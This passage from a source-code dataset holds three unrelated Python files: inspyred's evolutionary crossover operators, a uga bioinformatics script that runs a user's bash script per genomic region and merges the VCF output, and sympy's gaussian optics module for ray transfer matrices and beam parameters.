    update rule used in particle swarm optimization. This function
    also makes use of the bounder function as specified in the EC's
    ``evolve`` method.

    .. note::

       This function assumes that candidates can be pickled (for hashing
       as keys to a dictionary).

    .. Arguments:
       random -- the random number generator object
       candidates -- the candidate solutions
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    """
    crossover_rate = args.setdefault('crossover_rate', 1.0)
    bounder = args['_ec'].bounder
    # Drop the trailing candidate when the count is odd so parents pair up.
    if len(candidates) % 2 == 1:
        candidates = candidates[:-1]

    # Since we don't have fitness information in the candidates, we need
    # to make a dictionary containing the candidate and its corresponding
    # individual in the population.  Candidates are keyed by their pickled
    # bytes (protocol 1) so unhashable candidates (e.g. lists) can be used.
    population = list(args['_ec'].population)
    lookup = dict(zip([pickle.dumps(p.candidate, 1) for p in population], population))

    moms = candidates[::2]
    dads = candidates[1::2]
    children = []
    for mom, dad in zip(moms, dads):
        if random.random() < crossover_rate:
            bro = copy.copy(dad)
            sis = copy.copy(mom)
            # Compares the Individual objects, i.e. by fitness; both
            # children are moved toward the fitter parent.
            mom_is_better = lookup[pickle.dumps(mom, 1)] > lookup[pickle.dumps(dad, 1)]
            for i, (m, d) in enumerate(zip(mom, dad)):
                negpos = 1 if mom_is_better else -1
                val = d if mom_is_better else m
                # Random step from the worse parent toward the better one.
                bro[i] = val + random.random() * negpos * (m - d)
                sis[i] = val + random.random() * negpos * (m - d)
            bro = bounder(bro, args)
            sis = bounder(sis, args)
            children.append(bro)
            children.append(sis)
        else:
            children.append(mom)
            children.append(dad)
    return children
@crossover
def simulated_binary_crossover(random, mom, dad, args):
    """Return the offspring of simulated binary crossover on the candidates.

    This function performs simulated binary crossover (SBX), following the
    implementation in NSGA-II
    `(Deb et al., ICANNGA 1999) <http://vision.ucsd.edu/~sagarwal/icannga.pdf>`_.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *sbx_distribution_index* -- the non-negative distribution index
      (default 10)

    A small value of the `sbx_distribution_index` optional argument allows
    solutions far away from parents to be created as child solutions,
    while a large value restricts only near-parent solutions to be created as
    child solutions.
    """
    crossover_rate = args.setdefault('crossover_rate', 1.0)
    if random.random() < crossover_rate:
        di = args.setdefault('sbx_distribution_index', 10)
        bounder = args['_ec'].bounder
        bro = copy.copy(dad)
        sis = copy.copy(mom)
        for i, (m, d, lb, ub) in enumerate(zip(mom, dad, bounder.lower_bound, bounder.upper_bound)):
            try:
                # Order the pair so m <= d for the spread computation.
                if m > d:
                    m, d = d, m
                # beta limits the spread so children stay within [lb, ub].
                beta = 1.0 + 2 * min(m - lb, ub - d) / float(d - m)
                alpha = 2.0 - 1.0 / beta**(di + 1.0)
                u = random.random()
                # Sample the spread factor beta_q from the SBX
                # polynomial distribution with index `di`.
                if u <= (1.0 / alpha):
                    beta_q = (u * alpha)**(1.0 / float(di + 1.0))
                else:
                    beta_q = (1.0 / (2.0 - u * alpha))**(1.0 / float(di + 1.0))
                bro_val = 0.5 * ((m + d) - beta_q * (d - m))
                bro_val = max(min(bro_val, ub), lb)
                sis_val = 0.5 * ((m + d) + beta_q * (d - m))
                sis_val = max(min(sis_val, ub), lb)
                # Randomly swap which child gets which value.
                if random.random() > 0.5:
                    bro_val, sis_val = sis_val, bro_val
                bro[i] = bro_val
                sis[i] = sis_val
            except ZeroDivisionError:
                # Raised when m == d (identical alleles).
                # The offspring already have legitimate values for every element,
                # so no need to take any special action here.
                pass
        return [bro, sis]
    else:
        return [mom, dad]
@crossover
def laplace_crossover(random, mom, dad, args):
    """Return the offspring of Laplace crossover on the candidates.

    Performs Laplace crossover (LX) as specified in (Deep and Thakur,
    "A new crossover operator for real coded genetic algorithms,"
    Applied Mathematics and Computation, Volume 188, Issue 1, May 2007,
    pp. 895--911).  Offspring are displaced from their parents by
    ``beta * |m - d|``, where *beta* is drawn from a Laplace
    distribution with location *lx_location* and scale *lx_scale*.
    Offspring are passed through the EC's bounder.

    .. Arguments:
       random -- the random number generator object
       mom -- the first parent candidate
       dad -- the second parent candidate
       args -- a dictionary of keyword arguments

    Optional keyword arguments in args:

    - *crossover_rate* -- the rate at which crossover is performed
      (default 1.0)
    - *lx_location* -- the location parameter (default 0)
    - *lx_scale* -- the scale parameter (default 0.5)

    *lx_location* and *lx_scale* play roles analogous to the mean and
    standard deviation of a Gaussian: a scale near zero produces
    offspring near the parents, a larger scale produces offspring
    farther away.
    """
    rate = args.setdefault('crossover_rate', 1.0)
    if random.random() >= rate:
        return [mom, dad]
    bounder = args['_ec'].bounder
    loc = args.setdefault('lx_location', 0)
    scale = args.setdefault('lx_scale', 0.5)
    bro, sis = copy.copy(dad), copy.copy(mom)
    for pos, (m_gene, d_gene) in enumerate(zip(mom, dad)):
        u = random.random()
        if random.random() <= 0.5:
            beta = loc - scale * math.log(u)
        else:
            beta = loc + scale * math.log(u)
        spread = beta * abs(m_gene - d_gene)
        bro[pos] = m_gene + spread
        sis[pos] = d_gene + spread
    return [bounder(bro, args), bounder(sis, args)]
| saulshanabrook/pushgp.py | thirdparty/inspyred-1.0/inspyred/ec/variators/crossovers.py | Python | bsd-3-clause | 18,632 | [
"Gaussian"
] | 460e28e396410cde671e38d3c38bd283363b12d980c3b39036062a330a9eeaf1 |
## Copyright (c) 2015 Ryan Koesterer GNU General Public License v3
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import numpy as np
from uga import Parse
from Bio import bgzf
from uga import Process
import subprocess
import multiprocessing as mp
import sys
import os
import resource
import logging
import pickle
import glob
import pysam
logging.basicConfig(format='%(asctime)s - %(processName)s - %(name)s - %(message)s',level=logging.DEBUG)
logger = logging.getLogger("RunSnvgroup")
def process_regions(regions_df, cfg, cpu, log):
    """Run the user-supplied bash script once per region assigned to `cpu`.

    regions_df -- DataFrame of regions; filtered to rows where 'cpu' == cpu
    cfg        -- config dict ('out', 'source', 'file' are used here)
    cpu        -- 1-based cpu index this worker handles
    log        -- when True, redirect this worker's stdout to a per-cpu log

    Returns 0 on success, -1 if a tool error (interrupt) occurred, and 1 if
    the log file could not be opened.
    """
    regions_df = regions_df[regions_df['cpu'] == cpu].reset_index(drop=True)
    if log:
        try:
            log_file = open(cfg['out'] + '.cpu' + str(cpu) + '.log','w')
        # NOTE(review): bare except hides the real failure reason; narrowing
        # to OSError would be safer.
        except:
            print(Process.Error("unable to initialize log file " + cfg['out'] + '.cpu' + str(cpu) + '.log').out)
            return 1
        # Redirect all prints below into the per-cpu log; restored at the end.
        stdout_orig = sys.stdout
        sys.stdout = log_file
    tool_error = False
    print('')
    print('sourcing bash script ' + cfg['source'])
    with open(cfg['source'],'r') as s:
        base_cmd = s.read()
    for k in range(len(regions_df.index)):
        print('')
        print('loading region ' + str(k+1) + '/' + str(len(regions_df.index)) + ' (' + regions_df['region'][k] + ') ...')
        # Substitute the UGA_* placeholders in the script template for this
        # region; ':' is replaced by 'bp' where the value is used in filenames.
        cmd = base_cmd.replace('UGA_FILE',cfg['file']).replace('UGA_OUT',cfg['out'] + '.cpu' + str(cpu) + '.chr' + regions_df['region'][k].replace(':','bp')).replace('UGA_REGION_BP',regions_df['region'][k].replace(':','bp')).replace('UGA_REGION',regions_df['region'][k]).replace('UGA_OUT',cfg['out'])
        with open(cfg['out'] + '.source','w') as s:
            s.write(cmd)
        try:
            p = subprocess.Popen(['sh','-c', cmd],stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=1)
            # NOTE(review): on Python 3 p.stdout yields bytes, so the ''
            # sentinel never matches b'' at EOF -- confirm text mode or
            # a bytes sentinel is intended here.
            for line in iter(p.stdout.readline, ''):
                sys.stdout.write(line)
            p.wait()
        except KeyboardInterrupt:
            # NOTE(review): kill_all is not imported in this module's
            # visible imports -- verify it is defined elsewhere, otherwise
            # this handler raises NameError.
            kill_all(p.pid)
            tool_error = True
            pass
        status = 'processed region ' + str(k+1) + '/' + str(len(regions_df.index)) + ' (' + regions_df['region'][k] + ') ...'
        print(status)
        sys.stdout.flush()
    if log:
        sys.stdout = stdout_orig
        log_file.close()
    if tool_error:
        return -1
    else:
        return 0
def RunTools(args):
    """Entry point: fan region processing out over CPUs, then merge results.

    Workflow: parse config -> select this job's regions -> run
    process_regions per cpu (multiprocessing when cfg['cpus'] > 1) ->
    replay per-cpu logs -> concatenate per-region bgzipped VCF output into
    one tabix-indexed file.  Returns 0 on success, 1 on any error.
    """
    cfg = Parse.generate_tools_cfg(args)
    Parse.print_tools_options(cfg)

    if not cfg['debug']:
        logging.disable(logging.CRITICAL)

    # Only the rows belonging to this job number are processed here.
    regions_df = pd.read_table(cfg['region_file'], compression='gzip' if cfg['region_file'].split('.')[-1] == 'gz' else None)
    regions_df = regions_df[regions_df['job'] == int(cfg['job'])].reset_index(drop=True)

    return_values = {}
    print('')
    print("initializing out file")
    try:
        bgzfile = bgzf.BgzfWriter(cfg['out'] + '.gz', 'wb')
    # NOTE(review): bare except; narrowing to OSError would be safer.
    except:
        print(Process.Error("failed to initialize bgzip format out file " + cfg['out'] + '.gz').out)
        return 1

    if cfg['cpus'] > 1:
        # cpus-1 worker processes; the last share of regions runs in the
        # main process so all cpus stay busy.
        pool = mp.Pool(cfg['cpus']-1)
        for i in range(1,cfg['cpus']):
            return_values[i] = pool.apply_async(process_regions, args=(regions_df,cfg,i,True,))
            print("submitting job on cpu " + str(i) + " of " + str(cfg['cpus']))
        pool.close()
        print("executing job for cpu " + str(cfg['cpus']) + " of " + str(cfg['cpus']) + " via main process")
        main_return = process_regions(regions_df,cfg,cfg['cpus'],True)
        pool.join()
        if 1 in [return_values[i].get() for i in return_values] or main_return == 1:
            print(Process.Error("error detected, see log files").out)
            return 1
    else:
        main_return = process_regions(regions_df,cfg,1,True)
        if main_return == 1:
            print(Process.Error("error detected, see log files").out)
            return 1

    # Replay and remove each worker's log so output appears in cpu order.
    for i in range(1,cfg['cpus']+1):
        try:
            logfile = open(cfg['out'] + '.cpu' + str(i) + '.log', 'r')
        except:
            print(Process.Error("failed to initialize log file " + cfg['out'] + '.cpu' + str(i) + '.log').out)
            return 1
        print(logfile.read())
        logfile.close()
        os.remove(cfg['out'] + '.cpu' + str(i) + '.log')

    # Merge the per-region VCF outputs: header is copied once (from the
    # first file), then data rows from every region, then temp files are
    # deleted.
    written = False
    for i in range(1,cfg['cpus']+1):
        cpu_regions_df = regions_df[regions_df['cpu'] == i].reset_index()
        for j in range(0,len(cpu_regions_df.index)):
            f_temp=glob.glob(cfg['out'] + '.cpu' + str(i) + '.chr' + cpu_regions_df['region'][j].replace(':','bp') + '*.gz')[0]
            try:
                h=pysam.TabixFile(filename=f_temp,parser=pysam.asVCF())
            except:
                print(Process.Error("failed to load vcf file " + f_temp))
                return 1
            if not written:
                for row in h.header:
                    bgzfile.write(str(row) + '\n')
                written = True
            h_iter = h.fetch(region=str(cpu_regions_df['chr'][j]))
            for row in h_iter:
                bgzfile.write(str(row) + '\n')
            for f in glob.glob(cfg['out'] + '.cpu' + str(i) + '.chr' + cpu_regions_df['region'][j].replace(':','bp') + '.*'):
                os.remove(f)
    bgzfile.close()

    print("indexing out file")
    try:
        pysam.tabix_index(cfg['out'] + '.gz',preset="vcf",force=True)
    except:
        print(Process.Error('failed to generate index').out)
        return 1

    print("process complete")
    return 0
| rmkoesterer/uga | uga/RunTools.py | Python | gpl-3.0 | 5,404 | [
"pysam"
] | 3f3eff5c39b8de1771ab3fa3cff6aee7a58b81fe3a7c97f0d48fbd82df5e9b7a |
# -*- encoding: utf-8 -*-
"""
Gaussian optics.
The module implements:
- Ray transfer matrices for geometrical and gaussian optics.
See RayTransferMatrix, GeometricRay and BeamParameter
- Conjugation relations for geometrical and gaussian optics.
See geometric_conj*, gauss_conj and conjugate_gauss_beams
The conventions for the distances are as follows:
focal distance
positive for convergent lenses
object distance
positive for real objects
image distance
positive for real images
"""
from sympy import (atan2, Expr, I, im, Matrix, oo, pi, re, sqrt, sympify,
together)
from sympy.utilities.misc import filldedent
###
# A, B, C, D matrices
###
class RayTransferMatrix(Matrix):
    """
    Base class for a Ray Transfer Matrix.

    It should be used if there isn't already a more specific subclass mentioned
    in See Also.

    Parameters
    ==========

    parameters : A, B, C and D or 2x2 matrix (Matrix(2, 2, [A, B, C, D]))

    Examples
    ========

    >>> from sympy.physics.gaussopt import RayTransferMatrix, ThinLens
    >>> from sympy import Symbol, Matrix

    >>> mat = RayTransferMatrix(1, 2, 3, 4)
    >>> mat
    [1, 2]
    [3, 4]

    >>> RayTransferMatrix(Matrix([[1, 2], [3, 4]]))
    [1, 2]
    [3, 4]

    >>> mat.A
    1

    >>> f = Symbol('f')
    >>> lens = ThinLens(f)
    >>> lens
    [   1, 0]
    [-1/f, 1]

    >>> lens.C
    -1/f

    See Also
    ========

    GeometricRay, BeamParameter,
    FreeSpace, FlatRefraction, CurvedRefraction,
    FlatMirror, CurvedMirror, ThinLens

    References
    ==========

    [1] http://en.wikipedia.org/wiki/Ray_transfer_matrix_analysis
    """

    def __new__(cls, *args):
        # Accept either the four entries A, B, C, D or a ready 2x2 Matrix.
        if len(args) == 4:
            temp = ((args[0], args[1]), (args[2], args[3]))
        elif len(args) == 1 \
            and isinstance(args[0], Matrix) \
            and args[0].shape == (2, 2):
            temp = args[0]
        else:
            raise ValueError(filldedent('''
                Expecting 2x2 Matrix or the 4 elements of
                the Matrix but got %s''' % str(args)))
        return Matrix.__new__(cls, temp)

    def __mul__(self, other):
        # Dispatch on the operand type so optical objects propagate
        # through the system with a natural `matrix * object` syntax.
        if isinstance(other, RayTransferMatrix):
            return RayTransferMatrix(Matrix.__mul__(self, other))
        elif isinstance(other, GeometricRay):
            return GeometricRay(Matrix.__mul__(self, other))
        elif isinstance(other, BeamParameter):
            # ABCD law: q' = (A*q + B)/(C*q + D); split the result into
            # real part (distance to waist) and imaginary part (Rayleigh
            # range) for the new BeamParameter.
            temp = self*Matrix(((other.q,), (1,)))
            q = (temp[0]/temp[1]).expand(complex=True)
            return BeamParameter(other.wavelen, \
                                 together(re(q)), \
                                 z_r = together(im(q)))
        else:
            return Matrix.__mul__(self, other)

    @property
    def A(self):
        """
        The A parameter of the Matrix.

        Examples
        ========

        >>> from sympy.physics.gaussopt import RayTransferMatrix
        >>> mat = RayTransferMatrix(1, 2, 3, 4)
        >>> mat.A
        1
        """
        return self[0, 0]

    @property
    def B(self):
        """
        The B parameter of the Matrix.

        Examples
        ========

        >>> from sympy.physics.gaussopt import RayTransferMatrix
        >>> mat = RayTransferMatrix(1, 2, 3, 4)
        >>> mat.B
        2
        """
        return self[0, 1]

    @property
    def C(self):
        """
        The C parameter of the Matrix.

        Examples
        ========

        >>> from sympy.physics.gaussopt import RayTransferMatrix
        >>> mat = RayTransferMatrix(1, 2, 3, 4)
        >>> mat.C
        3
        """
        return self[1, 0]

    @property
    def D(self):
        """
        The D parameter of the Matrix.

        Examples
        ========

        >>> from sympy.physics.gaussopt import RayTransferMatrix
        >>> mat = RayTransferMatrix(1, 2, 3, 4)
        >>> mat.D
        4
        """
        return self[1, 1]
class FreeSpace(RayTransferMatrix):
    """
    Ray Transfer Matrix for free space.

    Parameters
    ==========

    distance

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import FreeSpace
    >>> from sympy import symbols
    >>> d = symbols('d')
    >>> FreeSpace(d)
    [1, d]
    [0, 1]
    """
    def __new__(cls, d):
        # Propagation over distance d only shears height by d*angle.
        return RayTransferMatrix.__new__(cls, 1, d, 0, 1)
class FlatRefraction(RayTransferMatrix):
    """
    Ray Transfer Matrix for refraction at a flat interface.

    Parameters
    ==========

    n1 : refractive index of one medium
    n2 : refractive index of other medium

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import FlatRefraction
    >>> from sympy import symbols
    >>> n1, n2 = symbols('n1 n2')
    >>> FlatRefraction(n1, n2)
    [1,     0]
    [0, n1/n2]
    """
    def __new__(cls, n1, n2):
        # Snell's law in the paraxial limit scales the angle by n1/n2.
        n1, n2 = sympify(n1), sympify(n2)
        return RayTransferMatrix.__new__(cls, 1, 0, 0, n1/n2)
class CurvedRefraction(RayTransferMatrix):
    """
    Ray Transfer Matrix for refraction at a curved interface.

    Parameters
    ==========

    R : radius of curvature (positive for concave)
    n1 : refractive index of one medium
    n2 : refractive index of other medium

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import CurvedRefraction
    >>> from sympy import symbols
    >>> R, n1, n2 = symbols('R n1 n2')
    >>> CurvedRefraction(R, n1, n2)
    [               1,     0]
    [(n1 - n2)/(R*n2), n1/n2]
    """
    def __new__(cls, R, n1, n2):
        R, n1, n2 = sympify((R, n1, n2))
        # Curvature adds the focusing term (n1 - n2)/(R*n2) to element C.
        return RayTransferMatrix.__new__(cls, 1, 0, (n1 - n2)/(R*n2), n1/n2)
class FlatMirror(RayTransferMatrix):
    """
    Ray Transfer Matrix for reflection.

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import FlatMirror
    >>> FlatMirror()
    [1, 0]
    [0, 1]
    """
    def __new__(cls):
        # A flat mirror leaves height and angle unchanged (identity matrix).
        return RayTransferMatrix.__new__(cls, 1, 0, 0, 1)
class CurvedMirror(RayTransferMatrix):
    """
    Ray Transfer Matrix for reflection from a curved surface.

    Parameters
    ==========

    R : radius of curvature (positive for concave)

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import CurvedMirror
    >>> from sympy import symbols
    >>> R = symbols('R')
    >>> CurvedMirror(R)
    [   1, 0]
    [-2/R, 1]
    """
    def __new__(cls, R):
        # A mirror of radius R acts like a lens of focal length R/2.
        radius = sympify(R)
        return RayTransferMatrix.__new__(cls, 1, 0, -2/radius, 1)
class ThinLens(RayTransferMatrix):
    """
    Ray Transfer Matrix for a thin lens.

    Parameters
    ==========

    f : the focal distance

    See Also
    ========

    RayTransferMatrix

    Examples
    ========

    >>> from sympy.physics.gaussopt import ThinLens
    >>> from sympy import symbols
    >>> f = symbols('f')
    >>> ThinLens(f)
    [   1, 0]
    [-1/f, 1]
    """
    def __new__(cls, f):
        # The only effect of a thin lens is the angle kick -height/f.
        focal = sympify(f)
        return RayTransferMatrix.__new__(cls, 1, 0, -1/focal, 1)
###
# Representation for geometric ray
###
class GeometricRay(Matrix):
    """
    Representation for a geometric ray in the Ray Transfer Matrix formalism.

    Parameters
    ==========

    h : height, and
    angle : angle, or
    matrix : a 2x1 matrix (Matrix(2, 1, [height, angle]))

    Examples
    =======

    >>> from sympy.physics.gaussopt import GeometricRay, FreeSpace
    >>> from sympy import symbols, Matrix
    >>> d, h, angle = symbols('d, h, angle')

    >>> GeometricRay(h, angle)
    [    h]
    [angle]

    >>> FreeSpace(d)*GeometricRay(h, angle)
    [angle*d + h]
    [      angle]

    >>> GeometricRay( Matrix( ((h,), (angle,)) ) )
    [    h]
    [angle]

    See Also
    ========

    RayTransferMatrix

    """

    def __new__(cls, *args):
        # Accept either a ready 2x1 column Matrix or the pair (h, angle).
        if len(args) == 1 and isinstance(args[0], Matrix) \
                and args[0].shape == (2, 1):
            temp = args[0]
        elif len(args) == 2:
            temp = ((args[0],), (args[1],))
        else:
            raise ValueError(filldedent('''
                Expecting 2x1 Matrix or the 2 elements of
                the Matrix but got %s''' % str(args)))
        return Matrix.__new__(cls, temp)

    @property
    def height(self):
        """
        The distance from the optical axis.

        Examples
        ========

        >>> from sympy.physics.gaussopt import GeometricRay
        >>> from sympy import symbols
        >>> h, angle = symbols('h, angle')
        >>> gRay = GeometricRay(h, angle)
        >>> gRay.height
        h
        """
        return self[0]

    @property
    def angle(self):
        """
        The angle with the optical axis.

        Examples
        ========

        >>> from sympy.physics.gaussopt import GeometricRay
        >>> from sympy import symbols
        >>> h, angle = symbols('h, angle')
        >>> gRay = GeometricRay(h, angle)
        >>> gRay.angle
        angle
        """
        return self[1]
###
# Representation for gauss beam
###
class BeamParameter(Expr):
    """
    Representation for a gaussian ray in the Ray Transfer Matrix formalism.

    Parameters
    ==========

    wavelen : the wavelength,
    z : the distance to waist, and
    w : the waist, or
    z_r : the rayleigh range

    Examples
    ========

    >>> from sympy.physics.gaussopt import BeamParameter
    >>> p = BeamParameter(530e-9, 1, w=1e-3)
    >>> p.q
    1 + 1.88679245283019*I*pi
    >>> p.q.n()
    1.0 + 5.92753330865999*I
    >>> p.w_0.n()
    0.00100000000000000
    >>> p.z_r.n()
    5.92753330865999
    >>> from sympy.physics.gaussopt import FreeSpace
    >>> fs = FreeSpace(10)
    >>> p1 = fs*p
    >>> p.w.n()
    0.00101413072159615
    >>> p1.w.n()
    0.00210803120913829

    See Also
    ========

    RayTransferMatrix

    References
    ==========

    [1] http://en.wikipedia.org/wiki/Complex_beam_parameter
    """
    #TODO A class Complex may be implemented. The BeamParameter may
    # subclass it. See:
    # https://groups.google.com/d/topic/sympy/7XkU07NRBEs/discussion
    # NOTE(review): mutable instance attributes on an Expr subclass are
    # unusual for sympy; presumably kept this way for legacy pickle
    # compatibility -- confirm before restructuring.
    __slots__ = ['z', 'z_r', 'wavelen']
    def __new__(cls, wavelen, z, **kwargs):
        # Exactly one of the keyword arguments `w` (waist) or `z_r`
        # (rayleigh range) must be supplied; a waist is converted to the
        # equivalent rayleigh range via waist2rayleigh.
        wavelen, z = sympify((wavelen, z))
        inst = Expr.__new__(cls, wavelen, z)
        inst.wavelen = wavelen
        inst.z = z
        if len(kwargs) !=1:
            raise ValueError('Constructor expects exactly one named argument.')
        elif 'z_r' in kwargs:
            inst.z_r = sympify(kwargs['z_r'])
        elif 'w' in kwargs:
            inst.z_r = waist2rayleigh(sympify(kwargs['w']), wavelen)
        else:
            raise ValueError('The constructor needs named argument w or z_r')
        return inst
    @property
    def q(self):
        """
        The complex parameter representing the beam.

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.q
        1 + 1.88679245283019*I*pi
        """
        # q = z + i*z_r (complex beam parameter).
        return self.z + I*self.z_r
    @property
    def radius(self):
        """
        The radius of curvature of the phase front.

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.radius
        0.2809/pi**2 + 1
        """
        # R(z) = z * (1 + (z/z_r)**2)
        return self.z*(1+(self.z/self.z_r)**2)
    @property
    def w(self):
        """
        The beam radius at `1/e^2` intensity.

        See Also
        ========

        w_0 : the minimal radius of beam

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.w
        0.001*sqrt(0.2809/pi**2 + 1)
        """
        # w(z) = w_0 * sqrt(1 + (z/z_r)**2)
        return self.w_0*sqrt(1+(self.z/self.z_r)**2)
    @property
    def w_0(self):
        """
        The beam waist (minimal radius).

        See Also
        ========

        w : the beam radius at `1/e^2` intensity

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.w_0
        0.00100000000000000
        """
        # Inverse of waist2rayleigh: w_0 = sqrt(z_r * lambda / pi).
        return sqrt(self.z_r/pi*self.wavelen)
    @property
    def divergence(self):
        """
        Half of the total angular spread.

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.divergence
        0.00053/pi
        """
        # Far-field half-angle: theta = lambda / (pi * w_0).
        return self.wavelen/pi/self.w_0
    @property
    def gouy(self):
        """
        The Gouy phase.

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.gouy
        atan(0.53/pi)
        """
        # psi(z) = atan2(z, z_r), i.e. atan(z/z_r) in the right quadrant.
        return atan2(self.z, self.z_r)
    @property
    def waist_approximation_limit(self):
        """
        The minimal waist for which the gauss beam approximation is valid.

        The gauss beam is a solution to the paraxial equation. For curvatures
        that are too great it is not a valid approximation.

        Examples
        ========

        >>> from sympy.physics.gaussopt import BeamParameter
        >>> p = BeamParameter(530e-9, 1, w=1e-3)
        >>> p.waist_approximation_limit
        1.06e-6/pi
        """
        # Paraxial validity threshold: 2 * lambda / pi.
        return 2*self.wavelen/pi
###
# Utilities
###
def waist2rayleigh(w, wavelen):
    """
    Calculate the rayleigh range from the waist of a gaussian beam.

    See Also
    ========

    rayleigh2waist, BeamParameter

    Examples
    ========

    >>> from sympy.physics.gaussopt import waist2rayleigh
    >>> from sympy import symbols
    >>> w, wavelen = symbols('w wavelen')
    >>> waist2rayleigh(w, wavelen)
    pi*w**2/wavelen
    """
    # z_r = pi * w**2 / lambda
    waist, lam = sympify((w, wavelen))
    return pi*waist**2/lam
def rayleigh2waist(z_r, wavelen):
    """Calculate the waist from the rayleigh range of a gaussian beam.

    See Also
    ========

    waist2rayleigh, BeamParameter

    Examples
    ========

    >>> from sympy.physics.gaussopt import rayleigh2waist
    >>> from sympy import symbols
    >>> z_r, wavelen = symbols('z_r wavelen')
    >>> rayleigh2waist(z_r, wavelen)
    sqrt(wavelen*z_r)/sqrt(pi)
    """
    # Inverse of waist2rayleigh: w = sqrt(z_r * lambda / pi).
    rayleigh, lam = sympify((z_r, wavelen))
    return sqrt(rayleigh/pi*lam)
def geometric_conj_ab(a, b):
    """
    Conjugation relation for geometrical beams under paraxial conditions.

    Takes the distances to the optical element and returns the needed
    focal distance.

    See Also
    ========

    geometric_conj_af, geometric_conj_bf

    Examples
    ========

    >>> from sympy.physics.gaussopt import geometric_conj_ab
    >>> from sympy import symbols
    >>> a, b = symbols('a b')
    >>> geometric_conj_ab(a, b)
    a*b/(a + b)
    """
    a, b = sympify((a, b))
    # If one of the distances is infinite, the conjugate reduces to the
    # other (finite) distance.
    if abs(b) == oo:
        return a
    if abs(a) == oo:
        return b
    # Thin-lens conjugation: 1/f = 1/a + 1/b  =>  f = a*b/(a + b).
    return a*b/(a + b)
def geometric_conj_af(a, f):
    """
    Conjugation relation for geometrical beams under paraxial conditions.

    Takes the object distance (for geometric_conj_af) or the image distance
    (for geometric_conj_bf) to the optical element and the focal distance.
    Then it returns the other distance needed for conjugation.

    See Also
    ========

    geometric_conj_ab

    Examples
    ========

    >>> from sympy.physics.gaussopt import geometric_conj_af, geometric_conj_bf
    >>> from sympy import symbols
    >>> a, b, f = symbols('a b f')
    >>> geometric_conj_af(a, f)
    a*f/(a - f)
    >>> geometric_conj_bf(b, f)
    b*f/(b - f)
    """
    a, f = sympify((a, f))
    # Reusing the two-distance relation with -f and negating the result
    # yields a*f/(a - f) while keeping the infinity handling consistent.
    return -geometric_conj_ab(a, -f)

# The relation is symmetric in object/image distance, so both names
# share a single implementation.
geometric_conj_bf = geometric_conj_af
def gaussian_conj(s_in, z_r_in, f):
    """
    Conjugation relation for gaussian beams.

    Parameters
    ==========

    s_in : the distance to optical element from the waist
    z_r_in : the rayleigh range of the incident beam
    f : the focal length of the optical element

    Returns
    =======

    a tuple containing (s_out, z_r_out, m)
    s_out : the distance between the new waist and the optical element
    z_r_out : the rayleigh range of the emergent beam
    m : the ration between the new and the old waists

    Examples
    ========

    >>> from sympy.physics.gaussopt import gaussian_conj
    >>> from sympy import symbols
    >>> s_in, z_r_in, f = symbols('s_in z_r_in f')
    >>> gaussian_conj(s_in, z_r_in, f)[0]
    1/(-1/(s_in + z_r_in**2/(-f + s_in)) + 1/f)
    >>> gaussian_conj(s_in, z_r_in, f)[1]
    z_r_in/(1 - s_in**2/f**2 + z_r_in**2/f**2)
    >>> gaussian_conj(s_in, z_r_in, f)[2]
    1/sqrt(1 - s_in**2/f**2 + z_r_in**2/f**2)
    """
    s_in, z_r_in, f = sympify((s_in, z_r_in, f))
    # Shared denominator for both the magnification and the new
    # rayleigh range: 1 - (s_in/f)**2 + (z_r_in/f)**2.
    denom = (1 - (s_in/f)**2) + (z_r_in/f)**2
    s_out = 1 / ( -1/(s_in + z_r_in**2/(s_in - f)) + 1/f )
    magnification = 1/sqrt(denom)
    z_r_out = z_r_in / denom
    return (s_out, z_r_out, magnification)
def conjugate_gauss_beams(wavelen, waist_in, waist_out, **kwargs):
    """
    Find the optical setup conjugating the object/image waists.

    Parameters
    ==========

    wavelen : the wavelength of the beam
    waist_in and waist_out : the waists to be conjugated
    f : the focal distance of the element used in the conjugation

    Returns
    =======

    a tuple containing (s_in, s_out, f)
    s_in : the distance before the optical element
    s_out : the distance after the optical element
    f : the focal distance of the optical element

    Examples
    ========

    >>> from sympy.physics.gaussopt import conjugate_gauss_beams
    >>> from sympy import symbols, factor
    >>> l, w_i, w_o, f = symbols('l w_i w_o f')
    >>> conjugate_gauss_beams(l, w_i, w_o, f=f)[0]
    f*(-sqrt(w_i**2/w_o**2 - pi**2*w_i**4/(f**2*l**2)) + 1)
    >>> factor(conjugate_gauss_beams(l, w_i, w_o, f=f)[1])
    f*w_o**2*(w_i**2/w_o**2 - sqrt(w_i**2/w_o**2 - pi**2*w_i**4/(f**2*l**2)))/w_i**2
